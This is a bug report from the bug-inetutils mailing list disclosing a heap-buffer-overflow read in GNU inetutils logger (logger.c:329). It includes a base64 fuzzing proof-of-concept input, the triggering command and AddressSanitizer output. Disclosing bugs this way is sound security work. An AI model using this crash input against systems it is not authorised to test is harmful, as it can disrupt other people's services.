bug-inetutils
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Heap-based Buffer Overflow in logger

From: AiDai
Subject: Heap-based Buffer Overflow in logger
Date: Fri, 24 Dec 2021 14:13:13 +0800
# Heap-based Buffer Overflow in logger

## Description

Heap-based Buffer Overflow in logger at inetutils/src/logger.c:329

**version**

```
./logger --version
logger (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by Sergey Poznyakoff.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

**poc**

```
base64 poc
ZYdn/3JycmMjY2NPcnJjI2NjTwCAAAoAAIAAAABECm5vjAB9UQpubm9ybREqGzZNaYSEKhs2TWmE
hHY=
```

**command**

```
./logger -s < ./poc
```

**Result**

```
 ./logger -s < ./poc
e�g�rrrc#ccOrrc#ccO
=================================================================
==4156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000003f at pc 0x0000004c679b bp 0x7ffe5f3b7250 sp 0x7ffe5f3b7248
READ of size 1 at 0x60c00000003f thread T0
    #0 0x4c679a in send_to_syslog /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11
    #1 0x4c5cf2 in main /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:511:2
    #2 0x7fa5804200b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x41c46d in _start (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x41c46d)

0x60c00000003f is located 1 bytes to the left of 120-byte region [0x60c000000040,0x60c0000000b8)
allocated by thread T0 here:
    #0 0x494bad in malloc (/root/disk2/fuzzing/inetutils/fuzz/bin/logger+0x494bad)
    #1 0x7fa58047f6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x8000000000000005  (<unknown module>)

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/disk2/fuzzing/inetutils/inetutils/src/logger.c:329:11 in send_to_syslog
Shadow bytes around the buggy address:
  0x0c187fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c187fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff8000: fa fa fa fa fa fa fa[fa]00 00 00 00 00 00 00 00
  0x0c187fff8010: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
  0x0c187fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c187fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==4156==ABORTING
```

reply via email to
[Prev in Thread] Current Thread [Next in Thread]